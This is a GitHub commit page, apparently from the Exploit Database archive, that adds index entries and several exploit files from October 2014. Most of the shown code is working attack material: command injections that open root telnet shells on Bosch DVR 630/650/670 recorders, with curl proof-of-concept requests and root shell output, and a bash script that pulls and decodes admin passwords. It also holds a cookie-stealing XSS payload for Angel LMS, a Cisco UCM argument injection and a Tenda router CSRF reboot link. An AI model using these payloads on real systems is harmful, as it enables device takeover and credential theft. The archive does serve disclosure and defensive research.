Skip to content

Commit 478ee15

Browse files
author
Offensive Security
committed
Updated 10_16_2014
1 parent d6656d5 commit 478ee15

18 files changed

Lines changed: 1540 additions & 0 deletions

File tree

files.csv

Lines changed: 17 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -31197,6 +31197,7 @@ id,file,description,date,author,platform,type,port
3119731197
34644,platforms/php/webapps/34644.txt,"Silurus Classifieds wcategory.php ID Parameter XSS",2009-08-06,Moudi,php,webapps,0
3119831198
34645,platforms/php/webapps/34645.txt,"Silurus Classifieds search.php keywords Parameter XSS",2009-08-06,Moudi,php,webapps,0
3119931199
34646,platforms/php/webapps/34646.txt,"Blog Ink (Blink) Multiple SQL Injection Vulnerabilities",2009-08-03,Drosophila,php,webapps,0
31200+
34648,platforms/windows/local/34648.txt,"Comodo Internet Security - HIPS/Sandbox Escape PoC",2014-09-13,"Joxean Koret",windows,local,0
3120031201
34649,platforms/php/webapps/34649.txt,"Netautor Professional 5.5 'login2.php' Cross Site Scripting Vulnerability",2010-09-17,"Gjoko Krstic",php,webapps,0
3120131202
34650,platforms/php/webapps/34650.txt,"e-Soft24 Flash Games Script 1.0 Cross Site Scripting Vulnerability",2009-08-30,"599eme Man",php,webapps,0
3120231203
34651,platforms/php/webapps/34651.txt,"e-Soft24 Jokes Portal Script Seo 1.0 Multiple Cross Site Scripting Vulnerabilities",2009-08-30,"599eme Man",php,webapps,0
@@ -31474,3 +31475,19 @@ id,file,description,date,author,platform,type,port
3147431475
34950,platforms/php/remote/34950.php,"PHP <= 5.3.2 'xml_utf8_decode()' UTF-8 Input Validation Vulnerability",2009-05-11,root@80sec.com,php,remote,0
3147531476
34951,platforms/php/webapps/34951.txt,"Online Work Order Suite Login SQL Injection Vulnerability",2010-11-02,VSN,php,webapps,0
3147631477
34952,platforms/multiple/remote/34952.txt,"Apache Shiro Directory Traversal Vulnerability",2010-11-02,"Luke Taylor",multiple,remote,0
31478+
34953,platforms/linux/local/34953.txt,"FUSE fusermount Tool - Race Condition Vulnerability",2010-11-02,halfdog,linux,local,0
31479+
34954,platforms/hardware/local/34954.txt,"Cisco Unified Communications Manager <= 8.0 Invalid Argument Privilege Escalation Vulnerability",2010-11-03,"Knud Erik Hjgaard",hardware,local,0
31480+
34955,platforms/php/webapps/34955.txt,"Joomla! 1.5.x SQL Error Information Disclosure Vulnerability",2010-11-05,"YGN Ethical Hacker Group",php,webapps,0
31481+
34956,platforms/hardware/webapps/34956.txt,"Bosch Security Systems DVR 630/650/670 Series - Multiple Vulnerabilities",2014-10-14,dun,hardware,webapps,0
31482+
34957,platforms/ios/webapps/34957.txt,"PayPal Inc BB #85 MB iOS 4.6 - Auth Bypass Vulnerability",2014-10-14,Vulnerability-Lab,ios,webapps,0
31483+
34958,platforms/php/webapps/34958.py,"Croogo 2.0.0 - Arbitrary PHP Code Execution Exploit",2014-10-14,LiquidWorm,php,webapps,0
31484+
34959,platforms/php/webapps/34959.txt,"Croogo 2.0.0 - Multiple Stored XSS Vulnerabilities",2014-10-14,LiquidWorm,php,webapps,0
31485+
34966,platforms/windows/local/34966.txt,"Telefonica O2 Connection Manager 3.4 - Local Privilege Escalation Vulnerability",2014-10-14,LiquidWorm,windows,local,0
31486+
34967,platforms/windows/local/34967.txt,"Telefonica O2 Connection Manager 8.7 - Service Trusted Path Privilege Escalation",2014-10-14,LiquidWorm,windows,local,0
31487+
34968,platforms/php/webapps/34968.txt,"YourMembers Plugin - Blind SQL Injection",2014-10-14,TranDinhTien,php,webapps,0
31488+
34969,platforms/hardware/webapps/34969.html,"Tenda A32 Router - CSRF Vulnerability",2014-10-14,zixian,hardware,webapps,0
31489+
34970,platforms/php/webapps/34970.py,"SEO Control Panel 3.6.0 - Authenticated SQL Injection",2014-10-14,"Tiago Carvalho",php,webapps,0
31490+
34971,platforms/asp/webapps/34971.txt,"Angel Learning Management System 7.3 'pdaview.asp' Cross Site Scripting Vulnerability",2010-11-05,"Wesley Kerfoot",asp,webapps,0
31491+
34972,platforms/php/webapps/34972.txt,"Joomla! AutoArticles 3000 'id' Parameter SQL Injection Vulnerability",2010-11-05,jos_ali_joe,php,webapps,0
31492+
34973,platforms/php/webapps/34973.txt,"FeedList 2.61.01 for WordPress 'handler_image.php' Cross Site Scripting Vulnerability",2010-11-08,"John Leitch",php,webapps,0
31493+
34974,platforms/php/webapps/34974.txt,"WP Survey And Quiz Tool 1.2.1 for WordPress Cross Site Scripting Vulnerability",2010-11-08,"John Leitch",php,webapps,0

platforms/asp/webapps/34971.txt

Lines changed: 11 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,11 @@
1+
source: http://www.securityfocus.com/bid/44689/info
2+
3+
Angel Learning Management System is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input.
4+
5+
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
6+
7+
Angel Learning Management System 7.3 is vulnerable; other versions may also be affected.
8+
9+
https://[Angel
10+
Root]/portal/pdaview.asp?p_TS=85546&p_id=InTouchMail&pdaback="<script>document.location="http://www.example.com/pentest/pwnt.php?cookie="%2bdocument.cookie;</script>?p_TS=
11+
85546

platforms/hardware/local/34954.txt

Lines changed: 11 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,11 @@
1+
source: http://www.securityfocus.com/bid/44672/info
2+
3+
Cisco Unified Communications Manager is prone to a local privilege-escalation vulnerability.
4+
5+
Attackers can exploit this issue to gain administrative access to the affected device and execute arbitrary code with superuser privileges. Successful exploits will lead to the complete compromise of the device.
6+
7+
This issue is tracked by Cisco Bug ID CSCti52041 and CSCti74930.
8+
9+
Cisco Unified Communications Manager 6, 7, and 8 are vulnerable.
10+
11+
/usr/local/cm/bin/pktCap_protectData -i";id"
Lines changed: 260 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,260 @@
1+
:::::::-. ... ::::::. :::.
2+
;;, `';, ;; ;;;`;;;;, `;;;
3+
`[[ [[[[' [[[ [[[[[. '[[
4+
$$, $$$$ $$$ $$$ "Y$c$$
5+
888_,o8P'88 .d888 888 Y88
6+
MMMMP"` "YmmMMMM"" MMM YM
7+
8+
[ Discovered by dun \ posdub[at]gmail.com ]
9+
[ 2014-10-01 ]
10+
###############################################################################
11+
# [ Bosch Security Systems DVR 630/650/670 Series ] Multiple Vulnerabilities #
12+
###############################################################################
13+
#
14+
# Device: "The Bosch Video Recorder 630/650 Series is an 8/16
15+
# channel digital recorder that uses the latest H.264
16+
# compression technology. With the supplied PC
17+
# software and built-in web server, the 630/650 Series is
18+
# a fully integrated, stand-alone video management
19+
# solution that's ready to go, straight out of the box.
20+
# Available with a variety of storage capacities, the
21+
# 630/650 Series features a highly reliable embedded
22+
# design that minimizes maintenance and reduces
23+
# operational costs. The recorder is also available with a
24+
# built-in DVD writer."
25+
#
26+
# Vendor: http://www.boschsecurity.com/
27+
# Product: DVR 630/650 http://resource.boschsecurity.us/documents/Data_sheet_enUS_1977239307.pdf
28+
# DVR 670 http://resource.boschsecurity.us/documents/DVR_670_Series_Data_sheet_enUS_7654294923.pdf
29+
#
30+
# Software Download:
31+
# http://resource.boschsecurity.us/software/Software_DVR630_650_firmware_v212_all_1980902667.zip
32+
# http://resource.boschsecurity.us/software/Software_DVR670_firmware_v212_enUS_8599929867.zip
33+
#
34+
# Timeline: 2014-10-01 Vulnerability discovered
35+
# 2014-10-03 1 Contact with vendor - No response
36+
# 2014-10-14 Published
37+
#
38+
#
39+
###################################################################
40+
# Gaining Root Shell Access [1]:
41+
42+
POST /Net_work.xml HTTP/1.1
43+
Accept: */*
44+
Accept-Language: pl
45+
Referer: http://10.11.219.2/network.html
46+
Content-Type: text/xml; charset=UTF-8
47+
Accept-Encoding: gzip, deflate
48+
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
49+
Host: 10.11.219.2
50+
Content-Length: 1274
51+
DNT: 1
52+
Proxy-Connection: Keep-Alive
53+
Pragma: no-cache
54+
Cookie: MosaLanguage=0; session=
55+
56+
<NETWORK_SETTING>
57+
<DHCP>0</DHCP>
58+
<DHCPIP>10.11.219.2</DHCPIP>
59+
<DHCPMASK>255.255.255.0</DHCPMASK>
60+
<DHCPGW>10.11.219.1</DHCPGW>
61+
<DHCPDNS1>0.0.0.0</DHCPDNS1>
62+
<DHCPDNS2>0.0.0.0</DHCPDNS2>
63+
<IP>10.11.219.2</IP>
64+
<MASK>255.255.255.0</MASK>
65+
<GW>10.11.219.1</GW>
66+
<DNS1>0.0.0.0</DNS1>
67+
<DNS2>0.0.0.0</DNS2>
68+
<HTTP_PORT>80</HTTP_PORT>
69+
<BANDWIDTH>0</BANDWIDTH>
70+
<DDNS_SERVER>1</DDNS_SERVER>
71+
<DYNDNS_HOST>wxss</DYNDNS_HOST>
72+
<DYNDNS_USER>ffl</DYNDNS_USER>
73+
<DYNDNS_PWD>|telnetd -l${SHELL} -p30 #</DYNDNS_PWD>
74+
<TZO_HOST></TZO_HOST>
75+
<TZO_MAIL></TZO_MAIL>
76+
<TZO_KEY></TZO_KEY>
77+
<SITE_HOST>sdads</SITE_HOST>
78+
<SITE_PWD>dsadsd</SITE_PWD>
79+
<SITE_RECORDID>sdasdas</SITE_RECORDID>
80+
<SITE_FQDN>dasdas</SITE_FQDN>
81+
<ALARM_ON>0</ALARM_ON>
82+
<MOTION>0</MOTION>
83+
<DISK_FAIL>0</DISK_FAIL>
84+
<DISK_FULL>0</DISK_FULL>
85+
<FAN_FAIL>0</FAN_FAIL>
86+
<DISK_TEMP>0</DISK_TEMP>
87+
<ADMIN_PW>0</ADMIN_PW>
88+
<VIDEO_LOSS>0</VIDEO_LOSS>
89+
<POWER>0</POWER>
90+
<SENDER>0</SENDER>
91+
<SMTP></SMTP>
92+
<SMTP_PORT>25</SMTP_PORT>
93+
<SSL>0</SSL>
94+
<USERNAME></USERNAME>
95+
<PWD></PWD>
96+
<SENDER_MAIL></SENDER_MAIL>
97+
<SUBJECT></SUBJECT>
98+
<MAIL_1></MAIL_1>
99+
<MAIL_2></MAIL_2>
100+
<MAIL_3></MAIL_3>
101+
<MAIL_TEST>0</MAIL_TEST>
102+
</NETWORK_SETTING>
103+
104+
## PoC:
105+
106+
root@debian:~# curl -i -s -k -X 'POST' -H 'Referer: http://10.11.219.2/network.html' -H 'Content-Type: text/xml; charset=UTF-8' \
107+
-H 'User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)' -H 'DNT: 1' \
108+
-b 'MosaLanguage=0; session=' --data-binary $'<NETWORK_SETTING>\x0d\x0a <DHCP>0</DHCP>\x0d\x0a <DHCPIP>10.11.219.2</DHCPIP>\x0d\x0a \
109+
<DHCPMASK>255.255.255.0</DHCPMASK>\x0d\x0a <DHCPGW>10.11.219.1</DHCPGW>\x0d\x0a <DHCPDNS1>0.0.0.0</DHCPDNS1>\x0d\x0a \
110+
<DHCPDNS2>0.0.0.0</DHCPDNS2>\x0d\x0a <IP>10.11.219.2</IP>\x0d\x0a <MASK>255.255.255.0</MASK>\x0d\x0a <GW>10.11.219.1</GW>\x0d\x0a \
111+
<DNS1>0.0.0.0</DNS1>\x0d\x0a <DNS2>0.0.0.0</DNS2>\x0d\x0a <HTTP_PORT>80</HTTP_PORT>\x0d\x0a <BANDWIDTH>0</BANDWIDTH>\x0d\x0a \
112+
<DDNS_SERVER>1</DDNS_SERVER>\x0d\x0a <DYNDNS_HOST>wxss</DYNDNS_HOST>\x0d\x0a <DYNDNS_USER>ffl</DYNDNS_USER>\x0d\x0a \
113+
<DYNDNS_PWD>|telnetd -l${SHELL} -p30 #</DYNDNS_PWD>\x0d\x0a <TZO_HOST></TZO_HOST>\x0d\x0a <TZO_MAIL></TZO_MAIL>\x0d\x0a \
114+
<TZO_KEY></TZO_KEY>\x0d\x0a <SITE_HOST>sdads</SITE_HOST>\x0d\x0a <SITE_PWD>dsadsd</SITE_PWD>\x0d\x0a \
115+
<SITE_RECORDID>sdasdas</SITE_RECORDID>\x0d\x0a <SITE_FQDN>dasdas</SITE_FQDN>\x0d\x0a <ALARM_ON>0</ALARM_ON>\x0d\x0a \
116+
<MOTION>0</MOTION>\x0d\x0a <DISK_FAIL>0</DISK_FAIL>\x0d\x0a <DISK_FULL>0</DISK_FULL>\x0d\x0a <FAN_FAIL>0</FAN_FAIL>\x0d\x0a \
117+
<DISK_TEMP>0</DISK_TEMP>\x0d\x0a <ADMIN_PW>0</ADMIN_PW>\x0d\x0a <VIDEO_LOSS>0</VIDEO_LOSS>\x0d\x0a <POWER>0</POWER>\x0d\x0a \
118+
<SENDER>0</SENDER>\x0d\x0a <SMTP></SMTP>\x0d\x0a <SMTP_PORT>25</SMTP_PORT>\x0d\x0a <SSL>0</SSL>\x0d\x0a <USERNAME></USERNAME>\x0d\x0a \
119+
<PWD></PWD>\x0d\x0a <SENDER_MAIL></SENDER_MAIL>\x0d\x0a <SUBJECT></SUBJECT>\x0d\x0a <MAIL_1></MAIL_1>\x0d\x0a <MAIL_2></MAIL_2>\x0d\x0a \
120+
<MAIL_3></MAIL_3>\x0d\x0a <MAIL_TEST>0</MAIL_TEST>\x0d\x0a</NETWORK_SETTING>\x0d\x0a' 'http://10.11.219.2/Net_work.xml'
121+
122+
root@debian:~# telnet 10.11.219.2 30
123+
Trying 10.11.219.2...
124+
Connected to 10.11.219.2.
125+
Escape character is '^]'.
126+
127+
BusyBox v1.1.2 (2009.12.29-03:59+0000) Built-in shell (ash)
128+
Enter 'help' for a list of built-in commands.
129+
130+
/ # id
131+
uid=0(root) gid=0(root)
132+
/ # uname -a
133+
Linux everfocus 2.6.24-rt1-hi3520v100 #9 Thu Sep 2 14:00:47 CST 2010 armv6l unknown
134+
/ # ps |grep telnet
135+
2827 root 228 S telnetd -l/bin/sh -p30
136+
/ # netstat -ltn | grep 30
137+
tcp 0 0 0.0.0.0:30 0.0.0.0:* LISTEN
138+
/ # echo pwnd & exit
139+
pwnd
140+
Connection closed by foreign host.
141+
root@debian:~#
142+
143+
###################################################################
144+
# Gaining Root Shell Access (authorization is needed) [2]:
145+
146+
GET /ntp.cgi?cmd=ntp_start&time_server=1&private_server=192.168.0.245|%20telnetd%20-l${SHELL}%20-p40;%20id&rnd=4392 HTTP/1.1
147+
Accept: */*
148+
Accept-Language: pl
149+
Referer: http://10.11.219.2/system.html
150+
Accept-Encoding: gzip, deflate
151+
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
152+
Host: 10.11.219.2
153+
DNT: 1
154+
Proxy-Connection: Keep-Alive
155+
Cookie: MosaLanguage=0; session=
156+
157+
## PoC:
158+
159+
root@debian:~# curl -i -s -k -X 'GET' \
160+
-H 'Referer: http://10.11.219.2/system.html' \
161+
-H 'User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)' -H 'DNT: 1' \
162+
-b 'MosaLanguage=0; session=' 'http://10.11.219.2/ntp.cgi?cmd=ntp_start&time_server=1&private_server=192.168.0.245|%20telnetd%20-l${SHELL}%20-p40;%20id'
163+
164+
165+
root@debian:~# telnet 10.11.219.2 40
166+
Trying 10.11.219.2...
167+
Connected to 10.11.219.2.
168+
Escape character is '^]'.
169+
170+
BusyBox v1.1.2 (2009.12.29-03:59+0000) Built-in shell (ash)
171+
Enter 'help' for a list of built-in commands.
172+
173+
/ # id
174+
uid=0(root) gid=0(root)
175+
/ # uname -a
176+
Linux everfocus 2.6.24-rt1-hi3520v100 #9 Thu Sep 2 14:00:47 CST 2010 armv6l unknown
177+
/ # ps |grep telnet
178+
2827 root 228 S telnetd -l/bin/sh -p40
179+
/ # netstat -ltn | grep 40
180+
tcp 0 0 0.0.0.0:40 0.0.0.0:* LISTEN
181+
/ # echo pwnd & exit
182+
pwnd
183+
Connection closed by foreign host.
184+
root@debian:~#
185+
186+
###################################################################
187+
# Admin Password Disclosure: http://10.11.219.2/User.cgi?cmd=get_user
188+
189+
## PoC Exploit:
190+
191+
#!/bin/bash
192+
x=0;
193+
for i in $(curl --silent http://10.11.219.2/User.cgi?cmd=get_user| sed 's/<[^>]\+>/ /g' | sed -r 's/(\s)+[0-9]//g');
194+
do base64 -d<<<$i; if [ $(( $x % 2 )) -eq 0 ]; then echo -n ":"; else echo ; fi; ((x++)); done
195+
196+
###################################################################
197+
# Sensitive Information Disclosure:
198+
199+
http://10.11.219.2/Config.cgi?cmd=system_info
200+
http://10.11.219.2/System.xml
201+
http://10.11.219.2/Net_work.xml
202+
203+
http://10.11.219.2/webcmd.html
204+
205+
/ # cat /4mosa600/data/Webcmd_help.txt
206+
207+
cmd value (sample)
208+
====================+==========================
209+
blockid | 0 ~ block max // show block info and flag and gop status.
210+
--------------------+-------------------------
211+
disk | // show disk temp.
212+
--------------------+-------------------------
213+
reboot | // restart DVR.
214+
--------------------+-------------------------
215+
remote-info | // socket status.
216+
--------------------+-------------------------
217+
log | 1: System // show system log.
218+
| 2: Record
219+
| 4: Login
220+
| 8: Configure
221+
| 16: Operation
222+
| 31: All
223+
| 63: Service
224+
--------------------+-------------------------
225+
ionly | 1~12 how many frames in a GOP will send to internet
226+
| 0: all I/P-frame (default)
227+
| 1: I only
228+
| 2: IP
229+
| 3: IPP
230+
| 4: IPPP
231+
| ....
232+
| 12: IPPPPPPPPPPP
233+
| others: show current value on DVR.
234+
--------------------+-------------------------
235+
chlink | 0~MKF_CHANNEL // show channel link.
236+
--------------------+-------------------------
237+
bitrate | // show bitrate information.
238+
--------------------+-------------------------
239+
dls | // show about time and DLS message.
240+
--------------------+-------------------------
241+
bmp | // dump bmp file to http://x.x.x.x/vga0.bmp
242+
--------------------+-------------------------
243+
msg | This is bitmap
244+
| bit 0 show encode FPS and Bitrate.
245+
| bit 1 show encode resolution.(dependent bit 1)
246+
| bit 2 show remote client mesage.
247+
| bit 3 show ptz command.
248+
| bit 4 cpu and memory usage..
249+
--------------------+-------------------------
250+
remote-cgi | 0 disable all cgi command.
251+
| 1 show all cgi command to console.
252+
| 2 show cig command if not "login_id"
253+
--------------------+-------------------------
254+
255+
256+
257+
258+
259+
260+
Lines changed: 14 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,14 @@
1+
# Exploit Title: Tenda A32 Router CSRF Vulnerability(reboot the Router)
2+
# CVE ID :CVE-2014-7281
3+
# Date: 2014-10-10
4+
# Exploit Author: zixian
5+
# Vendor Homepage: http://tenda.com.cn/
6+
# Software Link: http://tenda.com.cn/Catalog/Product/325
7+
# Version: V5.07.53_CN
8+
9+
10+
11+
When the administrator login, click on the link below? the device will reboot?
12+
13+
14+
<a href="http://192.168.2.1/goform/SysToolReboot">reboot</a>

0 commit comments

Comments
 (0)